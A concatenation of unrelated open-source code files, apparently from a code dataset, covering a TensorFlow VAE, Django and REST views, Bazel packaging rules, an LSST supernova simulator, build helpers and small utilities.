inputs = global_sum_pooling(inputs) # [n, 256]
print(':', inputs)
inputs = tf.concat([inputs, tf.cast(tf.expand_dims(labels, -1), dtype=tf.float32)], axis=-1) # [n, 257]
inputs = dense('dense2', inputs, 128) # [n, 128]
inputs = relu(inputs)
print(':', inputs)
inputs = dense('dense1', inputs, 64) # [n, 64]
inputs = relu(inputs)
print(':', inputs)
inputs = dense("dense", inputs, 2 * num_dims) # [n, 2*num_dims] 2 refers to mu and logvar
inputs = relu(inputs)
print(':', inputs)
mu = inputs[:, 0:num_dims]
logvar = inputs[:, num_dims:]
samples = tf.random_normal(shape=tf.shape(mu), mean=mu, stddev=tf.exp(0.5 * logvar))
return mu, logvar, samples
def var_list(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.name)
class DecoderX:
"""
This class transforms an embedding into reconstructed images.
Example:
Input dimension: z_dim (latent dims from Z) + w_dim (latent dims from W)
Output dimension: [n, 64, 64, 3] original image data
"""
def __init__(self, name='decoder_x'):
self.name = name
def __call__(self, inputs):
with tf.variable_scope(name_or_scope=self.name, reuse=tf.AUTO_REUSE):
# input: [n, z_dim+w_dim]
print(self.name)
inputs = relu(inputs)
inputs = dense('dense1', inputs, 8*8*256)
inputs = tf.reshape(inputs, [-1, 8, 8, 256])
inputs = Decoder_Block("Decoder-ConvBlock1", inputs, 256) # [n, 16, 16, 256]
print(':', inputs)
inputs = Decoder_Block("Decoder-ConvBlock2", inputs, 128) # [n, 32, 32, 128]
print(':', inputs)
inputs = Decoder_Block("Decoder-ConvBlock3", inputs, 32) # [n, 64, 64, 32]
print(':', inputs)
inputs = conv("conv4", inputs, 3, 5, 1) # [n, 64, 64, 3]
inputs = tanh(inputs)
print(':', inputs)
return inputs
def var_list(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.name)
class DecoderY:
"""
This class transforms an embedding into reconstructed labels.
Example:
Input dimension: z_dim (latent dims from Z)
Output dimension: [n, nums_class] labels
"""
def __init__(self, name='decoder_y'):
self.name = name
def __call__(self, inputs, nums_class):
with tf.variable_scope(name_or_scope=self.name, reuse=tf.AUTO_REUSE):
# input: [n, z_dim]
print(self.name)
inputs = relu(inputs)
inputs = dense('dense1', inputs, 8*8*256)
inputs = tf.reshape(inputs, [-1, 8, 8, 256])
inputs = Decoder_Block("Decoder-ConvBlock1", inputs, 256) # [n, 16, 16, 256]
print(':', inputs)
inputs = Decoder_Block("Decoder-ConvBlock2", inputs, 128) # [n, 32, 32, 128]
print(':', inputs)
inputs = Decoder_Block("Decoder-ConvBlock3", inputs, 32) # [n, 64, 64, 32]
print(':', inputs)
inputs = global_sum_pooling(inputs) # [n, 32]
print(':', inputs)
inputs = dense("dense2", inputs, nums_class) # [n, nums_class]
inputs = softmax(inputs)
print(':', inputs)
return inputs
def var_list(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.name)
| python |
# -*- coding: utf-8 -*-
from Speak import JLing_Speak
import sys
if __name__ == '__main__':
print('''
********************************************************
* JLing - 中文语音对话机器人 *
* (c) 2019 周定坤 <[email protected]> *
********************************************************
如需退出,可以按 Ctrl-c 组合键。
''')
try:
mybot = JLing_Speak()
mybot.Speak()
except:
exit()
| python |
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-02-17 16:32
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('events', '0020_image_name'),
]
operations = [
migrations.AlterUniqueTogether(
name='eventlink',
unique_together=set([('name', 'event', 'language', 'link')]),
),
]
| python |
#!/usr/bin/env python
import os
import sys
# build_path is mandatory, build_all is optional.
if len(sys.argv) < 2:
print "usage: %s [build_path> [build_all]" % sys.argv[0]
sys.exit(1)
# Build all is by default False.
build_all = False
if len(sys.argv) == 3 and sys.argv[2] == 'build_all':
build_all = True
build_path = sys.argv[1]
cmd = 'git clone https://github.com/daiwei89/hotbox_third_party %s' \
% build_path
print(cmd)
os.system(cmd)
if build_all:
cmd = 'cd %s; make -j third_party_core' % (build_path)
else:
cmd = 'cd %s; make -j third_party_special' % (build_path)
print(cmd)
os.system(cmd)
| python |
from django.shortcuts import get_object_or_404
from rest_framework import generics
from mangacache.models import Chapter, Manga, Author
from mangacache.serializers import AuthorSerializer, MangaSerializer, ChapterSerializer
class AuthorList(generics.ListCreateAPIView):
queryset = Author.objects.all()
serializer_class = AuthorSerializer
class AuthorDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = Author.objects.all()
serializer_class = AuthorSerializer
lookup_field = 'name'
class MangaList(generics.ListCreateAPIView):
queryset = Manga.objects.all()
serializer_class = MangaSerializer
# permission_classes = (permissions.IsAuthenticatedOrReadOnly)
class MangaDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = Manga.objects.all()
serializer_class = MangaSerializer
lookup_field = 'name'
class ChapterList(generics.ListCreateAPIView):
queryset = Chapter.objects.all()
serializer_class = ChapterSerializer
def perform_create(self, serializer):
serializer.save()
class ChapterDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = Chapter.objects.all()
serializer_class = ChapterSerializer
def get_object(self):
queryset = self.filter_queryset(self.get_queryset())
filter_kwargs = {
'name': self.kwargs['name'],
'number': self.kwargs['number']
}
obj = get_object_or_404(queryset, **filter_kwargs)
self.check_object_permissions(self.request, obj)
return obj
| python |
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Small utility script to simplify generating bindings"""
import argparse
import os
import subprocess
import sys
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.dirname(
os.path.dirname(
os.path.dirname(
os.path.dirname(SCRIPT_DIR))))
MOJO_SDK = os.path.join(SRC_DIR, 'mojo', 'public')
DART_SDK = os.path.join(SRC_DIR, 'third_party', 'dart-sdk', 'dart-sdk', 'bin')
DART = os.path.join(DART_SDK, 'dart')
PUB = os.path.join(DART_SDK, 'pub')
PACKAGES_DIR = os.path.join(SRC_DIR, 'mojo', 'dart', 'packages')
MOJOM_PACKAGE_DIR = os.path.join(PACKAGES_DIR, 'mojom')
MOJOM_BIN = os.path.join(MOJOM_PACKAGE_DIR, 'bin', 'mojom.dart')
def run(cwd, args):
print 'RUNNING:', ' '.join(args), 'IN:', cwd
subprocess.check_call(args, cwd=cwd)
def main():
parser = argparse.ArgumentParser(
description='Generate source-tree Dart bindings')
parser.add_argument('-f', '--force',
default = False,
help='Always generate all bindings.',
action='store_true')
parser.add_argument('-v', '--verbose',
default = False,
help='Verbose output.',
action='store_true')
args = parser.parse_args()
extra_args = []
if args.force:
extra_args += ['-f']
if args.verbose:
extra_args += ['-v']
run(MOJOM_PACKAGE_DIR, [PUB, 'get'])
run(SRC_DIR, [DART,
MOJOM_BIN,
'gen',
'-m',
MOJO_SDK,
'-r',
SRC_DIR,
'--output',
PACKAGES_DIR] + extra_args)
return 0
if __name__ == '__main__':
sys.exit(main())
| python |
import argparse
import logging
from http.server import HTTPServer, SimpleHTTPRequestHandler
from socketserver import TCPServer
class LoggingHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args):
logging.info(format % args)
def webserve():
parser = argparse.ArgumentParser(
description='Serve files from the current directory',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-v', '--verbose', action='store_true',
help='provide verbose output on progress')
parser.add_argument('-p', '--port', type=int, default=2020,
help='port number to use')
parser.add_argument('--logpath', type=str, metavar='PATH',
help='Path where logging output should be written')
args = parser.parse_args()
# Configure logging.
logging.basicConfig(filename=args.logpath, level=logging.INFO if args.verbose else logging.WARNING,
format='%(asctime)s %(levelname)s %(message)s', datefmt='%m/%d/%Y %H:%M:%S')
with TCPServer(('', args.port), LoggingHandler) as httpd:
logging.info('serving at port {0}'.format(args.port))
httpd.serve_forever()
| python |
#Based on paper Predicting Protein-Protein Interactions by Combing Various Sequence- Derived Features into the General Form of Chou’s Pseudo Amino Acid Composition by Zhao, Ma, and Yin
import os
import sys
#add parent and grandparent to path
currentdir = os.path.dirname(os.path.realpath(__file__))
parentdir = os.path.dirname(currentdir)
sys.path.append(parentdir)
parentdir = os.path.dirname(parentdir)
sys.path.append(parentdir)
import time
import numpy as np
from ProteinFeaturesHolder import ProteinFeaturesHolder
from GenericModule import GenericModule
from joblib import dump, load
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from GenericSVM import GenericSVM
class Zhao2012SVM(GenericModule):
def __init__(self, hyperParams = None):
GenericModule.__init__(self,hyperParams)
self.PCA = PCA(n_components=67)
self.scaler = StandardScaler()
self.modelType = None
self.featDict = self.hyperParams.get('featDict',{'all':['NMBroto_Zhao_30.tsv', 'Moran_Zhao_30.tsv', 'Geary_Zhao_30.tsv','PSEAAC_Zhao_30.tsv','Grantham_Sequence_Order_30.tsv','Schneider_Sequence_Order_30.tsv','Grantham_Quasi_30.tsv','Schneider_Quasi_30.tsv']})
def genModel(self):
self.model = GenericSVM(self.hyperParams)
def loadFeatureData(self,featureFolder):
super().loadFeatureData(featureFolder)
self.featuresData['all'].data = self.scaler.fit_transform(self.featuresData['all'].data)
self.featuresData['all'].data = self.PCA.fit_transform(self.featuresData['all'].data)
| python |
load("//tools/base/bazel:bazel.bzl", "iml_module")
load("//tools/base/bazel:kotlin.bzl", "kotlin_test")
load("//tools/base/bazel:maven.bzl", "maven_java_library", "maven_pom")
load("//tools/base/bazel:utils.bzl", "fileset", "flat_archive")
load("@bazel_tools//tools/build_defs/pkg:pkg.bzl", "pkg_tar")
load("//tools/base/bazel/sdk:sdk_utils.bzl", "calculate_jar_name_for_sdk_package", "tool_start_script")
platforms = ["win", "linux", "mac"]
def _generate_classpath_jar_impl(ctx):
runtime_jars = depset(transitive = [java_lib[JavaInfo].transitive_runtime_jars for java_lib in [ctx.attr.java_binary]])
jars = [calculate_jar_name_for_sdk_package(jar.short_path) for jar in runtime_jars.to_list()]
mffile = ctx.actions.declare_file(ctx.attr.java_binary.label.name + "-manifest")
ctx.actions.write(output = mffile, content = "Class-Path: \n " + " \n ".join(jars) + " \n")
arguments = ["c", ctx.outputs.classpath_jar.path, "META-INF/MANIFEST.MF=" + mffile.path]
outputs = [ctx.outputs.classpath_jar]
ctx.actions.run(
inputs = [mffile],
outputs = outputs,
arguments = arguments,
executable = ctx.executable._zipper,
)
generate_classpath_jar = rule(
implementation = _generate_classpath_jar_impl,
attrs = {
"java_binary": attr.label(allow_single_file = True, mandatory = True),
"_zipper": attr.label(default = Label("@bazel_tools//tools/zip:zipper"), cfg = "host", executable = True),
"classpath_jar": attr.output(),
},
)
def sdk_java_binary(name, command_name = None, main_class = None, runtime_deps = [], default_jvm_opts = {}, visibility = None):
command_name = command_name if command_name else name
native.java_library(
name = command_name,
runtime_deps = runtime_deps,
visibility = visibility,
)
classpath_jar = command_name + "-classpath.jar"
generate_classpath_jar(java_binary = command_name, name = command_name + "-classpath", classpath_jar = classpath_jar, visibility = ["//visibility:public"])
for platform in platforms:
tool_start_script(
name = name + "_wrapper_" + platform,
platform = platform,
command_name = command_name,
default_jvm_opts = default_jvm_opts.get(platform) or "",
main_class_name = main_class,
classpath_jar = classpath_jar,
visibility = visibility,
)
def _license_aspect_impl(target, ctx):
files = []
attrs = ctx.rule.attr
files = []
if "require_license" in attrs.tags:
out = ctx.actions.declare_file(target.notice.name + ".NOTICE", sibling = target.notice.file.files.to_list()[0])
ctx.actions.run_shell(
outputs = [out],
inputs = target.notice.file.files.to_list(),
arguments = [target.notice.file.files.to_list()[0].path, out.path],
command = "cp $1 $2",
)
files = [out]
all_deps = (attrs.deps if hasattr(attrs, "deps") else []) + \
(attrs.runtime_deps if hasattr(attrs, "runtime_deps") else []) + \
(attrs.exports if hasattr(attrs, "exports") else [])
transitive_notices = []
for dep in all_deps:
transitive_notices = transitive_notices + [dep.notices]
return struct(notices = depset(files, transitive = transitive_notices))
license_aspect = aspect(
implementation = _license_aspect_impl,
attr_aspects = ["deps", "runtime_deps", "exports"],
)
def _combine_licenses_impl(ctx):
inputs = depset(transitive = [dep.notices for dep in ctx.attr.deps]).to_list()
ctx.actions.run(
inputs = inputs,
outputs = [ctx.outputs.out],
arguments = [ctx.outputs.out.path] + [f.path for f in inputs],
executable = ctx.executable._combine_notices,
)
combine_licenses = rule(
implementation = _combine_licenses_impl,
attrs = {
"deps": attr.label_list(aspects = [license_aspect]),
"out": attr.output(mandatory = True),
"_combine_notices": attr.label(executable = True, cfg = "host", default = Label("//tools/base/bazel/sdk:combine_notices")),
},
)
def _package_component_impl(ctx):
inputs = []
args = ["c", ctx.outputs.out.path]
for bin in ctx.attr.bins:
file = bin.files.to_list()[0]
args.append("tools/bin/%s=%s" % (file.basename, file.path))
inputs += [file]
runtime_jars = depset(transitive = [java_lib[JavaInfo].transitive_runtime_jars for java_lib in ctx.attr.java_libs])
runtime_jar_names = {}
for jar in runtime_jars.to_list() + [j.files.to_list()[0] for j in ctx.attr.other_libs]:
name = calculate_jar_name_for_sdk_package(jar.short_path)
existing = runtime_jar_names.get(name)
if existing:
fail("Multiple jars have same name for SDK component with the same name! name= " + name + " jars= " + existing.path + " " + jar.path)
runtime_jar_names[name] = jar
args.append("tools/lib/%s=%s" % (name, jar.path))
inputs += [jar]
for other_file, other_location in ctx.attr.others.items():
args.append(other_location + "=" + other_file.files.to_list()[0].path)
inputs += other_file.files.to_list()
ctx.actions.run(
inputs = inputs,
outputs = [ctx.outputs.out],
executable = ctx.executable._zipper,
arguments = args,
progress_message = "Creating archive...",
mnemonic = "archiver",
)
package_component = rule(
implementation = _package_component_impl,
attrs = {
"bins": attr.label_list(),
"classpaths": attr.label_list(),
"java_libs": attr.label_list(),
"other_libs": attr.label_list(allow_files = True),
"others": attr.label_keyed_string_dict(allow_files = True),
"_zipper": attr.label(
default = Label("@bazel_tools//tools/zip:zipper"),
cfg = "host",
executable = True,
),
},
outputs = {"out": "%{name}.zip"},
)
def sdk_package(name, binaries, sourceprops, visibility):
version_file = "//tools/buildSrc/base:version.properties"
native.genrule(
name = "generate_source_props",
srcs = [sourceprops, version_file],
outs = ["source.properties"],
cmd = """
version=$$(sed -n '/^cmdlineToolsVersion/s/.* //p' $(location {version_file}));
sed "s/{{VERSION}}/$$version/" $(location {sourceprops}) > $(location source.properties)
""".format(version_file = version_file, sourceprops = sourceprops),
)
combine_licenses(name = name + "_combined_licenses", out = "NOTICE.txt", deps = binaries)
for platform in platforms:
package_component(
name = "%s_%s" % (name, platform),
bins = [bin + "_wrapper_" + platform for bin in binaries],
java_libs = binaries,
other_libs = [bin + "-classpath.jar" for bin in binaries],
others = {
"source.properties": "tools/source.properties",
name + "_combined_licenses": "tools/NOTICE.txt",
"README.libs": "tools/lib/README",
},
visibility = visibility,
)
native.filegroup(
name = name,
srcs = ["%s_%s.zip" % (name, platform) for platform in platforms],
visibility = visibility,
)
| python |
import sncosmo
from astropy.cosmology import w0waCDM
import numpy as np
from lsst.sims.catUtils.dust import EBV
import os
from scipy.interpolate import griddata
from sn_tools.sn_telescope import Telescope
from lsst.sims.photUtils import Bandpass, Sed
from astropy import units as u
import pandas as pd
from sn_tools.sn_io import check_get_dir,check_get_file
from sn_tools.sn_utils import LoadGamma
from sn_tools.sn_calcFast import srand
from astropy.table import Table, Column
"""
def SALT2Templates(SALT2Dir='SALT2.Guy10_UV2IR', blue_cutoff=3800.):
for vv in ['salt2_template_0', 'salt2_template_1']:
fName = '{}/{}_orig.dat'.format(SALT2Dir, vv)
data = np.loadtxt(fName, dtype={'names': ('phase', 'wavelength', 'flux'),
'formats': ('f8', 'i4', 'f8')})
print(data)
data['flux'][data['wavelength'] <= blue_cutoff] = 0.0
print(data)
np.savetxt('{}/{}.dat'.format(SALT2Dir, vv),
data, fmt=['%1.2f', '%4d', '%.7e', ])
"""
class Cutoffs:
def __init__(self, x1=-2.0, color=0.2, daymax=0.0,
blue_cutoff=380., redcutoff=800.,
mjdCol='observationStartMJD', filterCol='filter',
exptimeCol='visitExposureTime', nexpCol='numExposures',
m5Col='fiveSigmaDepth',SALT2Dir='',
url_index='https://me.lsst.eu/gris/DESC_SN_pipeline'):
model = 'salt2-extended'
version = '1.0'
self.url_index = url_index
source = sncosmo.get_source(model, version=version)
if SALT2Dir != '':
check_get_dir(url_index,SALT2Dir,SALT2Dir)
self.SALT2Templates(SALT2Dir=SALT2Dir, blue_cutoff=10.*blue_cutoff)
source = sncosmo.SALT2Source(modeldir=SALT2Dir)
dustmap = sncosmo.OD94Dust()
lsstmwebv = EBV.EBVbase()
self.mjdCol = mjdCol
self.filterCol = filterCol
self.exptimeCol=exptimeCol
self.nexpCol =nexpCol
self.m5Col =m5Col
self.x1 = x1
self.color = color
self.daymax = daymax
# SN model
self.SN = sncosmo.Model(source=source,
effects=[dustmap, dustmap],
effect_names=['host', 'mw'],
effect_frames=['rest', 'obs'])
# SN parameters
self.SN.set(t0=daymax)
self.SN.set(c=color)
self.SN.set(x1=x1)
# SN normalisation
# cosmology
H0 = 72.0
Omega_m = 0.3
Omega_l = 0.70
w0 = -1.0
wa = 0.0
self.cosmo = self.cosmology(H0, Omega_m, Omega_l, w0, wa)
# x0 normalisation
self.x0_grid = self.x0(-19.0906)
self.x0_from_grid = griddata((self.x0_grid['x1'], self.x0_grid['color']),
self.x0_grid['x0_norm'], (x1, color), method='nearest')
# wavelength for the model
wave_min = 3000.
wave_max = 11501.
self.wave = np.arange(wave_min, wave_max, 1.)
# telescope
self.telescope = Telescope(airmass=1.2)
lambda_min = dict(zip('grizy', [300., 670., 300., 300., 300.]))
# band registery in sncosmo
for band in 'grizy':
throughput = self.telescope.atmosphere[band]
print(band, lambda_min[band])
idx = throughput.wavelen <= lambda_min[band]
# throughput.sb[idx] = 0.
bandcosmo = sncosmo.Bandpass(
throughput.wavelen, throughput.sb, name='LSST::'+band, wave_unit=u.nm)
sncosmo.registry.register(bandcosmo, force=True)
#load gammas - necessary to estimate flux errors (photometry)
gammaDir = 'reference_files'
gammaName = 'gamma.hdf5'
gammas = LoadGamma('grizy', gammaDir, gammaName, url_index, self.telescope)
self.gamma = gammas.gamma
def SALT2Templates(self,SALT2Dir='SALT2.Guy10_UV2IR', blue_cutoff=3800.):
for vv in ['salt2_template_0', 'salt2_template_1']:
fName = '{}/{}_orig.dat'.format(SALT2Dir, vv)
data = np.loadtxt(fName, dtype={'names': ('phase', 'wavelength', 'flux'),
'formats': ('f8', 'i4', 'f8')})
print(data)
data['flux'][data['wavelength'] <= blue_cutoff] = 0.0
print(data)
np.savetxt('{}/{}.dat'.format(SALT2Dir, vv),
data, fmt=['%1.2f', '%4d', '%.7e', ])
def x0(self, absMag):
"""
Method to load x0 data
Parameters
---------------
config: dict
parameters to load and (potentially) regenerate x0s
Returns
-----------
"""
# check whether X0_norm file exist or not (and generate it if necessary)
x0normFile = 'reference_files/X0_norm_{}.npy'.format(absMag)
if not os.path.isfile(x0normFile):
# if this file does not exist, grab it from a web server
check_get_file(self.url_index, 'reference_files',
'X0_norm_{}.npy'.format(absMag))
return np.load(x0normFile)
def cosmology(self, H0, Omega_m, Omega_l, w0, wa):
cosmo = w0waCDM(H0=H0,
Om0=Omega_m,
Ode0=Omega_l,
w0=w0, wa=wa)
return cosmo
def set_x0(self, z):
# luminosity distance
lumidist = self.cosmo.luminosity_distance(z).value*1.e3
x0 = self.x0_from_grid / lumidist ** 2
alpha = 0.13
beta = 3.
x0 *= np.power(10., 0.4*(alpha * self.x1 - beta * self.color))
self.SN.set(x0=x0)
def __call__(self,obs,zrange=np.arange(0.01,1.2,0.01),selphase=False):
prodid='Test'
lc_out = 'LC_{}.hdf5'.format(prodid)
simu_out = 'Simu_{}.hdf5'.format(prodid)
metadata ={}
meta_names = ['x1','color','daymax','z','index_hdf5']
rmeta = []
for z in zrange:
lcdf = self.lc(obs, z,selphase=selphase)
table_lc = Table.from_pandas(lcdf)
index_hdf5 = '{}_{}_{}_{}'.format(self.x1,self.color,self.daymax,np.round(z,2))
meta_vals = [self.x1,self.color,self.daymax,np.round(z,2),index_hdf5,]
table_lc.meta = dict(zip(meta_names,meta_vals))
rmeta+=[table_lc.meta]
table_lc.write(lc_out, 'LC_{}'.format(index_hdf5), append=True, compression=True)
Table(rmeta,names=meta_names).write(
simu_out, 'summary', append=True, compression=True)
def update_meta(self,metadata,metadict):
print('hhhh',metadata,metadict.keys())
metc = dict(metadata)
if not metc:
metc = metadict
else:
#self.sn_meta[iproc]= self.sn_meta[iproc].update(metadict)
for key in metadict.keys():
print('kkey',key,metadict[key])
metc[key] += metadict[key]
print('alllo',metc)
return metc
def lc(self, obs, z,selphase=False):
# no dust
ebvofMW = 0.0
self.SN.set(mwebv=ebvofMW)
# z val
self.SN.set(z=z)
# x0 normalisation
self.set_x0(z)
# Select obs depending on min and max phases
# blue and red cutoffs applied
"""
obs = self.cutoff(obs, self.sn_parameters['daymax'],
self.sn_parameters['z'],
self.sn_parameters['min_rf_phase'],
self.sn_parameters['max_rf_phase'],
self.sn_parameters['blue_cutoff'],
self.sn_parameters['red_cutoff'])
"""
if selphase:
obs = self.selectObsPhase(obs, z)
# Get the fluxes (vs wavelength) for each obs
lcdf = pd.DataFrame(obs)
lcdf[self.filterCol] = 'LSST::'+lcdf[self.filterCol]
lcdf['x1'] = self.x1
lcdf['color'] = self.color
lcdf['daymax'] = self.daymax
lcdf = lcdf.round({'daymax': 2})
fluxes_cosmo = self.SN.bandflux(
lcdf[self.filterCol], lcdf[self.mjdCol], zpsys='ab', zp=2.5*np.log10(3631))
fluxcov_cosmo = self.SN.bandfluxcov(
lcdf[self.filterCol], lcdf[self.mjdCol], zpsys='ab', zp=2.5*np.log10(3631))
cov = np.sqrt(np.diag(fluxcov_cosmo[1]))
lcdf['flux'] = fluxes_cosmo
lcdf['mag'] = -2.5*np.log10(fluxes_cosmo/3631.)
lcdf['variance_model'] = np.diag(fluxcov_cosmo[1])
lcdf['z']=z
#estimate gammas
lcdf = lcdf.groupby([self.filterCol]).apply(
lambda x: self.interp_gamma_flux(x)).reset_index()
lcdf['snr_m5'] = 1./srand(lcdf['gamma'],lcdf['mag'],lcdf[self.m5Col])
# complete the LC
lcdf['magerr'] = (2.5/np.log(10.))/lcdf['snr_m5'] # mag error
lcdf['fluxerr'] = lcdf['flux']/lcdf['snr_m5'] # flux error
lcdf['zp'] = 2.5*np.log10(3631) # zp
lcdf['zpsys'] = 'ab' # zpsys
lcdf['phase'] = (lcdf[self.mjdCol]-self.daymax
)/(1.+z) # phase
# rename some of the columns
lcdf = lcdf.rename(
columns={self.mjdCol: 'time', self.filterCol: 'band', self.m5Col: 'm5', self.exptimeCol: 'exptime'})
lcdf = lcdf.round({'z': 2})
return lcdf
def interp_gamma_flux(self, grp, gammaName='gamma'):
"""
Method to estimate gamma and mag_to_flux values from interpolation
Parameters
---------------
grp: pandas group
data to process
Returns
----------
original group with two new cols:
gamma: gamma values
flux_e_sec: flux in pe.sec-1
"""
single_exptime = grp[self.exptimeCol]/grp[self.nexpCol]
# gamma interp
filterName = grp.name.split(':')[-1]
grp.loc[:, gammaName] = self.gamma[filterName](
(grp[self.m5Col].values, single_exptime, grp[self.nexpCol]))
return grp
def estimateFluxes(self, wavelength, fluxes, obs, throughput):
wavelength = np.repeat(wavelength[np.newaxis, :], len(fluxes), 0)
SED_time = Sed(wavelen=wavelength, flambda=fluxes)
fluxes = []
transes = []
nvals = range(len(SED_time.wavelen))
print('jjj', nvals)
# Arrays of SED, transmissions to estimate integrated fluxes
seds = [Sed(wavelen=SED_time.wavelen[i], flambda=SED_time.flambda[i])
for i in nvals]
transes = np.asarray([throughput[obs[self.filterCol][i]]
for i in nvals])
int_fluxes = np.asarray(
[seds[i].calcFlux(bandpass=transes[i]) for i in nvals])
print(int_fluxes, obs[self.filterCol])
def selectObsPhase(self, obs, z):
obs_sel = None
for b in 'grizy':
idx = obs[self.filterCol] == b
sel = obs[idx]
if len(sel) > 0:
phases = (sel[self.mjdCol]-self.daymax)/(1.+z)
idxa = np.argmin(np.abs(phases))
if obs_sel is None:
obs_sel = np.array(sel[idxa])
else:
obs_sel = np.hstack([obs_sel, np.array(sel[idxa])])
return obs_sel
def plot(self, obs, z):
import matplotlib.pyplot as plt
self.pltDef(plt)
# flux estimates
obs = self.selectObsPhase(obs, z)
obsdf = pd.DataFrame(obs)
obsdf[self.filterCol] = 'LSST::'+obsdf[self.filterCol]
throughput = self.telescope.atmosphere
# z val
self.SN.set(z=z)
# x0 normalisation
self.set_x0(z)
fluxes = 10.*self.SN.flux(obsdf[self.mjdCol], self.wave)
self.estimateFluxes(self.wave/10., fluxes, obs, throughput)
fig, ax = plt.subplots()
fig.suptitle('z = {}'.format(z))
for bb in 'grizy':
ax.plot(
10.*throughput[bb].wavelen, throughput[bb].sb)
axa = ax.twinx()
# axa.plot(self.wave, fluxes[0, :], color='k')
for fflux in fluxes:
idx = fflux > 10e-25
axa.plot(self.wave[idx], fflux[idx], color='k')
axa.fill_between(self.wave[idx], 0., fflux[idx], alpha=0.05)
ax.set_ylim([0., None])
axa.set_ylim([0., None])
ax.set_xlabel('wavelength [nm]')
ax.set_ylabel('sb (0-1)')
axa.set_ylabel('Flux [ergs / s / cm$^2$ / Angstrom]')
plt.show()
def pltDef(self, plt):
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
plt.rcParams['axes.labelsize'] = 12
plt.rcParams['legend.fontsize'] = 12
plt.rcParams['font.size'] = 12
fake_data = 'Fake_DESC.npy'
if not os.path.isfile(fake_data):
# data do not exist -> have to generate them
fake_config = 'input/Fake_cadence/Fake_cadence.yaml'
cmd = 'python run_scripts/fakes/make_fake.py --config {} --output {}'.format(
fake_config, fake_data.split('.')[0])
os.system(cmd)
z = 0.77
"""
lambda_g_min = 6700.
web_path=' https://me.lsst.eu/gris/DESC_SN_pipeline'
check_get_dir(web_path,SALT2Dir,SALT2Dir)
blue_cutoff = lambda_g_min/(1.+z)
blue_cutoff = 3600.
# make the SALT2 model with this cutoff
SALT2Templates(SALT2Dir=SALT2Dir, blue_cutoff=blue_cutoff)
"""
blue_cutoff = 380.
SALT2Dir = 'SALT2.Guy10_UV2IR'
mysimu = Cutoffs(SALT2Dir=SALT2Dir,blue_cutoff=blue_cutoff)
obs = np.load('Fake_DESC.npy')
mysimu.plot(obs, z=0.85)
plt.show()
"""
fluxdf = pd.DataFrame()
for zval in np.arange(0.01,1.2,0.01):
fluxdf = pd.concat((fluxdf,mysimu(obs, zval,selphase=False)))
print(fluxdf)
"""
#save data as two astropy tables: Simu*, LC*
lctable = mysimu(obs,selphase=False)
"""
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
fluxdf = fluxdf[fluxdf['flux']>0.]
filtercolors = dict(zip('ugrizy', ['b', 'c', 'g', 'y', 'r', 'm']))
for b in 'grizy':
idx = fluxdf['band'] == 'LSST::{}'.format(b)
sel = fluxdf[idx]
ax.plot(sel['z'],np.sqrt(sel['variance_model'])/sel['flux'],marker='.',color=filtercolors[b],label='{} band'.format(b))
ax.plot(sel['z'],sel['fluxerr']/sel['flux'],marker='.',color=filtercolors[b],ls='--')
ax.legend()
"""
plt.show()
| python |
from random import randint
from tools.population_creator import (ImpossibleToCompleteError, Individual,
create_individual)
def mutation(individual: Individual):
"""
:param individual: особь
:return: возвращает мутировавшую особь
Для мутации хромосомы сначала с помощью генератора случайных чисел
выбирается количество генов, которые не будут подвержены мутации.
Это значение лежит в интервале от 60% генов до N - 1 ген. То есть,
как минимум один ген мутирует всегда.
После выбираются сами гены, которые не будут подтвержены мутации.
На основании полученных в прошлом шаге номеров генов, формируется
шаблон хромосомы и функцией create_individual достраивается до
полной хромосомы.
"""
length: int = len(individual)
template: list = [None] * length
no_change_amount = range(randint(int(length * 0.5), int(length * 0.9)))
no_change_index = []
for _ in no_change_amount:
while True:
random_index = randint(0, length - 1)
if random_index not in no_change_index:
no_change_index.append(random_index)
break
no_change_index.sort()
for i in no_change_index:
template[i] = individual[i]
try:
mutant = create_individual(length + 1, template=template)
except ImpossibleToCompleteError:
mutant = None
return mutant
| python |
import os
from django.conf import settings
from pdf2image import convert_from_path
class PdfRasterizer:
def __init__(self):
self._dpi = settings.PDF_RASTERIZER["dpi"]
self._fmt = settings.PDF_RASTERIZER["format"]
self._thread_count = settings.PDF_RASTERIZER["thread_count"]
def rasterize_pdf(self, subfolder_path):
# Typically, pdf2image will write generated images to a temporary path, after
# which you can manipulate them. By providing 'output_file' and 'output_folder',
# we can skip that second step and make pdf2image write directly to our desired
# output folder, using our desired file name pattern.
return convert_from_path(
os.path.join(subfolder_path, "source.pdf"),
dpi=self._dpi,
fmt=self._fmt,
thread_count=self._thread_count,
output_file="image-",
output_folder=subfolder_path,
)
| python |
'''
This downloads the data about which locations Twitter provide top the top 10
trending item lists from and stores the data in the database
'''
from TrendAnalyser import TrendAnalyser
TA = TrendAnalyser()
print TA._update_woeid_data()
| python |
# -*- coding: utf-8 -*-
"""
tests - helper functions
~~~~~~~~~~~~~~~~~~~~~~~~
test cases for olaf helper function
:copyright: (c) 2015 by Vivek R.
:license: BSD, see LICENSE for more details.
"""
import os
import random
import string
import unittest
from click.testing import CliRunner
import olaf
class TestOlaf(unittest.TestCase):
def setUp(self):
self.runner = CliRunner()
def tearDown(self):
pass
@staticmethod
def get_random_string():
return ''.join(random.choice(
string.ascii_lowercase + string.digits) for _ in range(10))
def test_is_valid_path(self):
random_string = self.get_random_string()
with self.runner.isolated_filesystem():
temp_path = os.path.join(os.getcwd(), random_string)
with self.assertRaises(OSError):
olaf.is_valid_path(temp_path)
os.mkdir(temp_path)
self.assertTrue(olaf.is_valid_path(temp_path))
def test_is_valid_site(self):
with self.runner.isolated_filesystem():
